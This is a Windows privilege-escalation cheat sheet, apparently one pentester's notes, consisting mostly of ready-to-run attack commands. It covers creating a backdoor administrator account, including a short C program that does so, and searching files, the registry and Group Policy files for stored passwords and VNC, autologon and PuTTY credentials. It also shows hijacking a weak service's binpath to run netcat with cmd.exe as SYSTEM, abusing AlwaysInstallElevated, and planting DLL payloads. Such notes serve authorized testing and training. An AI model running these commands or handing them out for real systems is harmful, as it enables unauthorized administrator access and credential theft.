Useful Resources
http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
http://toshellandback.com/2015/11/24/ms-priv-esc/
Watch you tube videos
http://www.youtube.com/watch?v=kMG8IsCohHA
http://www.youtube.com/watch?v=_8xJaaQlpBo
http://www.greyhathacker.net/?p=738
Windows exploit suggester
https://github.com/GDSSecurity/Windows-Exploit-Suggester
python /home/nikhil/scripts/windows-exploit-suggester.py -d 2016-07-02-mssb.xls -i systeminfo -l
-l : show only local exploits
https://www.exploit-db.com/docs/26000.pdf
Windows Administrator to System
PSEXEC.exe -i -s -d CMD
https://blogs.technet.microsoft.com/askds/2008/10/22/getting-a-cmd-prompt-as-system-in-windows-vista-and-windows-server-2008/
http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html
Add Admin User account
net user /add [username] [password]
net localgroup administrators [username] /add
Compile follow C code into exe to add admin user account
#include
int main()
{ int i;i = system(“net user /add ashoka qwerty”);
i = system(“net localgroup administrators ashoka /add”);
return 0;}
Windows Priv Escalation Info gather
- windows-privesc-check2.exe
windows-privesc-check2.exe –audit -a -o wpc-report
- wmic_info.bat
Basic Commands
systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
hostname
echo %username%
net users
net user user1
If user is in power user group, refer https://blogs.technet.microsoft.com/markrussinovich/2006/05/01/the-power-in-power-users/
net view
net user /domain
echo %logonserver%
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start Running windows services
DRIVERQUERY
Search for file names
dir /s *pass* == *cred* == *vnc* == *.config*
Search within files
findstr /si pass *.xml *.ini *.txt *.config *.cfg *.bat
findstr /si pwd *.xml *.ini *.txt *.config *.cfg *.bat
Search registry
reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f pass /t REG_SZ /s
reg query HKLM /f pwd /t REG_SZ /sreg query HKCU /f password /t REG_SZ /s
Search for sensitive files
dir sysprep.inf /s
dir sysprep.xml /s
dir Unattended.xml /s
When machine on domain (Group Policy Preference GPP)
Search groups.xml in SYSVOL
Metasploit module for extracting it : post/windows/gather/credentials/gpp
C:\Windows\SYSVOL\sysvol
C:\ProgramData\Microsoft\Group Policy\History
Extracted these two paths from above exploit module
Encryption key: https://msdn.microsoft.com/en-us/library/Cc422924.aspx
Good resource on this topic : http://www.toshellandback.com/2015/08/30/gpp/
Install *.msi as SYSTEM if
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
Windows Services
Info on service
sc qc
Prevents pop ups to user :
accesschk.exe /accepteula
Use accesschk 5.2 if 6.0 doesn’t work
Access permissions on specific service
accesschk.exe -ucqv
Access permissions on specific Group
accesschk.exe -uwcqv “Authenticated Users” *
Look for following permissions
Modifying vulnerable services
sc qc upnphost
sc config upnphost binpath= “C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe”
sc config upnphost obj= “.\LocalSystem” password= “”
sc qc upnphost
net start upnphost
Files/Folder Permissions
- Examine ALL the binpaths for the windows services, scheduled tasks and startup tasks.
- Look for permissions on files/folders if can be changed.
- Replace the binaries/DLLs if possible
Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs “Authenticated Users” c:\
Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs “Authenticated Users” c:\*.*
Find weak permissions via Cacls or ICacls
cacls “C:\Program Files” /T | findstr Users
or
icacls “C:\Program Files” /T | findstr Users
DLL Hijacking
If any service tries to access non-exiting DLLs. But how to identify which services will do that? This might be done, by running the same service in a test environment and using sysinternal’s procmon to see what DLLs are requested by the service. DLL Redirection could also be used. https://msdn.microsoft.com/en-us/library/windows/desktop/ms682600(v=vs.85).aspx
You can see the DLL search order on 32-bit systems below:
1 – The directory from which the application loaded No access as limited user
2 – 32-bit System directory (C:\Windows\System32) No access as limited user
3 – 16-bit System directory (C:\Windows\System) No access as limited user
4 – Windows directory (C:\Windows) No access as limited user
5 – The current working directory (CWD) NA
6 – Directories in the PATH environment variable (system then user)
Check for permissions on directories in PATH environment variable
echo %PATH%
accesschk.exe -dqv “C:\Python27”sc qc
Generate msfvenom DLL payload
VNC Stored
reg query “HKCU\Software\ORL\WinVNC3\Password”
Windows Autologin:
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”
SNMP Parameters:
reg query “HKLM\SYSTEM\Current\ControlSet\Services\SNMP”
Putty clear text proxy credentials:
reg query “HKCU\Software\SimonTatham\PuTTY\Sessions”
Password Recovery Tools
Shatter Attack
For windows NT4.0, Win2000, WinXP
https://en.wikipedia.org/wiki/Shatter_attack
http://www.hpl.hp.com/techreports/2005/HPL-2005-87.pdf
Scheduled Tasks
schtasks /query /fo LIST /v
Find a task pointing to an insecure location
Orphaned Installs
Missing files in writable locations. But how to identify orphaned installs?